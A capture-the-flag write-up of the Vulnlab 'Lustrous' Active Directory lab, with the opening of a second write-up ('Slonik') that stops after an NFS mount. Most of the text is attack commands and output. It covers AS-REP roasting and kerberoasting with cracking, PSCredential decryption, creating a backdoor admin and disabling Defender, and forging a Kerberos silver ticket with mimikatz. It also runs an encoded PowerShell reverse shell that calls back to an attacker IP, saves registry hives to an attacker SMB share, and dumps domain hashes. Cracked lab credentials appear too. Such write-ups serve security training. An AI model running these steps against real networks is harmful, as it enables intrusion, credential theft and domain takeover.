Lustrous, a medium chain AD machine involved two machines, LusMS and LusDC , from LusMS, accessing the ftp share there were usernames which out of which ben.cox didn’t require any pre-authentication, resulting in AS-REP roasting , having remote access to LusMS, local administrator password found in a form of secure string that can be converted back to plaintext, getting the system account and accessing the web application on LusDC, it required kerberos authentication in order to access the site, since there was a service account with a SPN, on performing kerberoasting , svc_web’s hash was cracked and with forging silver ticket as tony.ward who is a part of backup operator group, we can retrieve his password from the site and with impacket-reg  retrieving the SAM, SYSTEM and SECURITY file and then dumping NTDS.dit file with LusDC hash to get domain admin

Writeup:

Enum anonymous ftp finds 3 users

After this we take a look for kerberoastable users

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-GetNPUsers -usersfile users.txt lustrous.vl/Username@lusdC.lustrous.vl -no-pass -dc-ip 10.10.187.53
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

$krb5asrep$23$ben.cox@LUSTROUS.VL:6c2235fc542be350acb491b50c61c07d$a9feb90a9a6784eba15a6af651082f5e97f3805acbf9dd672bc3a74ffdf4ef8700e34fc732393af129f6779f8023711787ace5213a4d7397c06621048dcd6ced94bcc3030e>
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set

.

impacket-GetUserSPNs -dc-ip 10.10.187.53 -usersfile users.txt -request lustrous.vl/'ben.cox':'Trinity1'

 

crack some hashes

The hash identifier for Kerberos 5, etype 23, AS-REP hashes is 18200.

The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.

You can find this within the hashcat example hashes page.

hashcat -m 18200 -o cracked.txt ben.cox.hash /usr/share/wordlists/rockyou.txt


.

Do some Bloodhound analysis, to find high valuable targets

bloodhound-python -d lustrous.vl -c all -u ben.cox -p Trinity1 -ns 10.10.187.53 --dns-tcp

.

$ impacket-GetUserSPNs Lustrous.vl/ben.cox:Trinity1 -dc-ip lusdc.lustrous.vl -request-user svc_web     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra


ServicePrincipalName    Name     MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------  -------  --------  --------------------------  --------------------------  ----------
http/lusdc              svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619             
http/lusdc.lustrous.vl  svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_web$LUSTROUS.VL$Lustrous.vl/svc_web*$fec3e242194f52c140173bb7e0b2df73$e898fd0c2e9ea4fed53d9537a90e5c4daf043e597802909d35109f8891bc25e5a6aaaa6e2739e485425b244c3735913ff0f4426ce73c6021df92c557f4ab1eb6c481a657d26b801e18cc6af1cc789316f2045fc77e2cbaaf97aa6ae1fb7f26a0310bb149f06c2a65c3ba2315b3178d17669c8eb7a5c571f2bfaf5d0673dff09564526c9308ecc38663419cc55cc7f30ed1c7e8507f6b328284cfbf8911e9fcbfb57b4ccf0c5718e370450ab04b8c6e32fc9339fa3a3a9b349f9b6331d49a3bf080d8d1f94982d4aa87ec49de95d6efb283a196124c1b8cdd1a44c9b1201cf213a07dfb5ce2cda72465368796a991a4e25ed2165e9af342f39a06dd7acf1bcd8146036d64f8913c63c13c7c2ec8e15e3bcc364fc0a15bd8caef7ea023461fa8ddd6f734d2e5f5aa6ed2a544c09b05d653896e7a4c44d27ffba095be6aceec903378b6fc6ca41fc485fcaf5f041682a8c2a7510e23b827a542464e68002dee9cd17a5d09ca3f6b8a9d69fd34fcaa0eb35d36db5f47b9af13f8bac9ca2fe84eabb5858f8ba85864eed9b407c53426bbcde4742a66ac734365d4d72faa8d68e6db348b5e70c5abc6278dc474ab8d91fa45fc38447b470f3f5b480a3c27c34ffac8aff5e7cbed4dcb5ac4529cf42b0f3142d053879891bc224acece35f25164c38a9b2ab058bae92c0498051259c4cba97214aff005d8adba5a073be1cab0dc832abae307b04694c049bd52cf774829d4ae48c79abd188e373fb6108c351f12969e5badc2da61e0c0a0a063dbc637e08473d332fcccd8a3bbb45d5360bd2c11861fe94a290e357c18be4c2c0f849843f3e93ba81a34a1eca0661a7b24e7f3cb459cbd73a243d49b9357c70efcddabe13afa1d9778033681129046a8034b1dd26217dae4bde336b5871961623f2156515325888499f3a6cda70985981550d147f61f028040c9f6a6c78a8b9c406ca1b7d47ac14a25db13c48db0726f215c650723fd267dd9b832fda6700fc964c0df83369c4d21e475d69ac907d072b561aa6011a5bcca92d93ee834bee6619b3461bd9db8371cc6872b4adacadd07119dd3128073c03c110e1878f7d35e51eff75e15b774e5d0e7c775b94bf2a8c3dbac3ab7fa3f38670ed3b486f9c5a7245afa95550a43bd8dbd3d8923f18565a3899294dea285cc7f8e653a493283449cad01be0862053c1121563d7ebfb4e63e896e19d1216e31dde60e04e1b6ea383b7c6c8534c97c6ff9ebe5e0e5839cc0c267cebd21461b847c07285c6d99fe14b6d35b22b96f4242acd5d0668a1431d14a582b0a19a35bd657f29b230173fb9bf0a76ed88aff79947ebdc45ff4067c5aa96ccb37ff9633b9a77b4f241f8961334cbaec36007670f0e695a76c735a2cb4106ef6e2de129c964e8353b37db9d9cad57a0998979539ea8435ee2ed4ca05fbb7472e46a212a096f0bf75

.

The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.

You can find this within the hashcat example hashes page.

hashcat -m 13100 -o cracked_svcweb.hash.txt svcweb.hash /usr/share/wordlists/rockyou.txt

.

winrm to lusms.lustrous.vl

evil-winrm --ip lusms.lustrous.vl -u 'ben.cox' -p 'Trinity1'

On Ben’s Desktop, we found an xml representation of a PSCredential Object file named admin.xml.

following this blog post, we can extract the cleartext data from the file

.

*Evil-WinRM* PS C:\Users\ben.cox\Desktop> type admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">LUSMS\Administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
</Props>
</Obj>
</Objs>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> 
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $user = "Administrator"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred.GetNetworkCredential() | Format-List


UserName       : Administrator
Password       : XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
SecurePassword : System.Security.SecureString
Domain         :



*Evil-WinRM* PS C:\Users\ben.cox\Desktop> 

 

logon as Administrator, and make ben.cox an admin

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusms.lustrous.vl -u 'Administrator' -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
VL{40<redacted>48}

*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user puck Summer2024 /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators puck /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators ben.cox /add
The command completed successfully.

Look around

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ xfreerdp  /u:puck /p:'Summer2024' /v:lusms.lustrous.vl /cert:ignore /rfx

start edge, login to https://lusdc.lustrous.vl as ben.cox
and find the secure note.

We have also the password for the service account, so we can craft a ticket for any other user. See: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets

We go and disable windows defender and upload mimikatz, in our current powershell session , where we can store a new ticket for the administrator account

set-mppreference -disablerealtimemonitoring $true
iwr http://10.8.2.138/mimikatz.exe -outfile mimikatz.exe

then we use mkpsrevshell.py

 

python3 mkpsrevshell.py 10.8.2.138 443

.

─$ impacket-atexec 'administrator'@10.10.207.70 "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
Password:
[*] Creating task \RqYvQaAv
[*] Running task \RqYvQaAv
[*] Deleting task \RqYvQaAv
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp

 

 

All in one

PS C:\temp> .\mimikatz.exe "kerberos::purge" "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519 
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt      
Service   : http
Target    : lusdc.lustrous.vl
Lifetime  : 9/21/2024 6:04:01 PM ; 9/19/2034 6:04:01 PM ; 9/19/2034 6:04:01 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
PS C:\temp>  iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

PS C:\temp> whoami
nt authority\system
PS C:\temp> hostname
LusMS
PS C:\temp> klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>	Client: tony.ward @ lustrous.vl
    Server: http/lusdc.lustrous.vl @ lustrous.vl
    KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent 
    Start Time: 9/21/2024 18:04:01 (local)
    End Time:   9/19/2034 18:04:01 (local)
    Renew Time: 9/19/2034 18:04:01 (local)
    Session Key Type: RSADSI RC4-HMAC(NT)
    Cache Flags: 0 
    Kdc Called: 
PS C:\temp> 

PS C:\temp>  iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

 

First we need the ntlm hash for the service account (svcweb)

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ iconv -f ASCII -t UTF-16LE <(printf "iydgTvmujl6f") | openssl dgst -md4
MD4(stdin)= e67af8b3d78df5a02eb0d57b6cb60717

The following wmic command can be use to get  the SID of tony.ward. ( or we use bloodhound for this )

C:\Windows\system32>wmic useraccount where name='tony.ward' get sid 
SID S-1-5-21-2355092754-1584501958-1513963426-1114

The NTLM hash we then use in the rc4 parameter

kerberos::golden /domain:lustrous.vl /user:administrator /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http  /ptt

and request our target website

iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content

This gives us u

We better do not use an Administrator account for this ( meaning we need to use another target in our case tony.ward to caft a silver ticket  for tony.ward

.

kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt

in Administrative cmd prompt:

C:\Windows\system32>runas.exe /noprofile /netonly /user:lustrous\ben.cox cmd.exe
Enter the password for lustrous\ben.cox: Trinity1
Attempting to start cmd.exe as user "lustrous\ben.cox" ...

C:\Windows\system32>

then

c:\temp>mimikatz

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service   : http
Target    : LusDC.lustrous.vl
Lifetime  : 7/27/2024 7:28:18 PM ; 7/25/2034 7:28:18 PM ; 7/25/2034 7:28:18 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz # exit
Bye!

c:\temp>

.

c:\temp>klist                                                                                                                                                                                                                                   Current LogonId is 0:0x4900d

Cached Tickets: (1)

#0>     Client: tony.ward @ lustrous.vl
        Server: http/LusDC.lustrous.vl @ lustrous.vl
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 7/27/2024 19:28:18 (local)
        End Time:   7/25/2034 19:28:18 (local)
        Renew Time: 7/25/2034 19:28:18 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\temp>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content



<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>

<div class="table">
 
                                    <td>
                                        Password Reminder
                                    </td>
                                    <td>
                                        U_cPVQ<redacted>0i1X
                                    </td>
                                    <td>
                                        lustrous_tony.ward
                                    </td>
                                    <td>
                                        <a class="btn btn-danger" href="/Internal
        </table>
        <input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" />
    </div>
        <hr />
        <footer>
            <p>&copy; 2024 - SNotes</p>
        </footer>
    </div>
</body>
</html>

PS C:\temp>

.

PRIVESC

 

Logged in as Ben powershell right click run as user tony.ward

PS C:\Users\ben.cox> whoami
lustrous\tony.ward

PS C:\Users\ben.cox> cd c:\temp
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl --acl

[*] Identity: LocalService
   \_ Access Type: Allow
   \_ Registry Rights: -2147483648
   \_ Inherited: False

[*] Identity: LocalService
   \_ Access Type: Allow
   \_ Registry Rights: ReadKey
   \_ Inherited: False

[*] Identity: BUILTIN\Administrators
   \_ Access Type: Allow
   \_ Registry Rights: 268435456
   \_ Inherited: False

[*] Identity: BUILTIN\Administrators
   \_ Access Type: Allow
   \_ Registry Rights: FullControl
   \_ Inherited: False

[*] Identity: BUILTIN\Backup Operators
   \_ Access Type: Allow
   \_ Registry Rights: ReadKey
   \_ Inherited: False
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl -o c:\windows\tasks\ --backup
[+] Exported \\lusdc.lustrous.vl\HKLM\SAM to c:\windows\tasks\3101BB00-F1ED-4F03-80F9-347F32D4F498
[+] Exported \\lusdc.lustrous.vl\HKLM\SYSTEM to c:\windows\tasks\B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[+] Exported \\lusdc.lustrous.vl\HKLM\SECURITY to c:\windows\tasks\2190EDEF-05BB-4DF7-B94A-729F19F83BBE
PS C:\temp>


.

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbclient lustrous.vl/tony.ward:U_cP<redacted>0i1X@lusdc.lustrous.vl                        

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use C$
# cd windows\tasks
# ls
drw-rw-rw-          0  Sat Jul 27 13:51:14 2024 .
drw-rw-rw-          0  Sat May 27 20:32:06 2023 ..
-rw-rw-rw-      45056  Sat Jul 27 13:51:14 2024 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
-rw-rw-rw-      28672  Sat Jul 27 13:51:12 2024 3101BB00-F1ED-4F03-80F9-347F32D4F498
-rw-rw-rw-   16965632  Sat Jul 27 13:51:13 2024 B254B23F-CE5D-483A-9FAD-92192AF7CC4E
-rw-rw-rw-          6  Sat Jul 27 11:50:13 2024 SA.DAT
# mget *
[*] Downloading 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
[*] Downloading 3101BB00-F1ED-4F03-80F9-347F32D4F498
[*] Downloading B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[*] Downloading SA.DAT
# 

or do it this way

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbserver smb . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.187.53,54551)
[*] AUTHENTICATE_MESSAGE (\,LUSDC)
[*] User LUSDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:smb)
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] LUSDC$::LUSTROUS:aaaaaaaaaaaaaaaa:a1abcb5128891908dd06050c91ebec30:0101000000000000002a54d31ee0da01c6fce3df3ca0410000000000010010006e0072006a00530065004b004f005800030010006e0072006a00530065004b004f00580002001000580070006f006200540046004900570004001000580070006f006200540046004900570007000800002a54d31ee0da0106000400020000000800300030000000000000000000000000400000e15257875fa1332fbc03b8a4fe3db518132560a8e7b113c3bb02a72a24cd55ff0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] ..snip..
[*] Disconnecting Share(1:smb)
[*] Closing down connection (10.10.187.53,54551)
[*] Remaining connections []

.

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-reg lustrous.vl/'tony.ward':'U_cP<redacted>0i1X'@10.10.187.53 -dc-ip 10.10.187.53 backup -o \\\\10.8.2.138\\smb  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.8.2.138\smb\SAM.save

[*] Saved HKLM\SYSTEM to \\10.8.2.138\smb\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.2.138\smb\SECURITY.save

now get the machine hashes

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e<redacted>97:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:7c8bc87fdc872e790bbf7789dba9ca54bdcd339a4858b7f0400af019b1ea70c306ca1aa097c61c16db78634d36d95d639e9e5e9486f2ac9366898ab26783e513d475edb080e42b9aa2643b83b6fcca12a57e4232154ad8aa34c32b6d7d3182d2509d8b34990dd5c23852c0149382c412bf45352f3ae8a490a454e6bd4c64a3e441f6dbeecf5f48baedbe7ddae74dd77813392a73150fa751e33f8ac0338877c7f09e54e1baef33094f8a716cd1ccc389027d80c1b834d35edd8cb926a8ba3841ca8f6afb3fa9f53c9fb11c6483ebd1f3127725c2bb160ca325869e91e2136192b454c95bdd4b662f8596518dee210daf
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:28<redacted>54
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up... 

get the users hashes

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump lustrous.vl/'LUSDC$'@lusdc.lustrous.vl -hashes aad3b435b51404eeaad3b435b51404ee:28<redacted>54 -just-dc-user Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8<redacted>76:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:192dc734a2de3bc95bad85d2f4e3380a89ed9edb2341b124745d5dbf7ccdf6bd
Administrator:aes128-cts-hmac-sha1-96:854da5162b192ac9e6d3e15e52d326ff
Administrator:des-cbc-md5:c110a4f7f80d5d86
[*] Cleaning up... 

evil win-rm to the dc

┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusdc.lustrous.vl -u 'Administrator' -H 'b8<redacted>76'                                               
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
LusDC
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{53<redacted>0b}

 

.

That was Fun !

 

 

 

 

 

vulnlab-slonik

vulnlab slonik

a medium linux box

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ mkdir extract2
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ sudo mount -t nfs 10.10.99.219: ./extract2
[sudo] password for puck: 
                                                                                                                     
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ cd extract2                                                            
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2]
└─$ ls -la
total 16
drwxr-xr-x 19 root root 4096 Jul 27 09:22 .
drwxrwxr-x  3 puck puck 4096 Jul 27 09:42 ..
drwxr-xr-x  3 root root 4096 Oct 24  2023 home
drwxr-xr-x 13 root root 4096 Sep 19  2023 var
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2]
└─$ cd home    
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ cd service
cd: permission denied: service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ sudo usermod -u 1337 1337                 
usermod: no changes
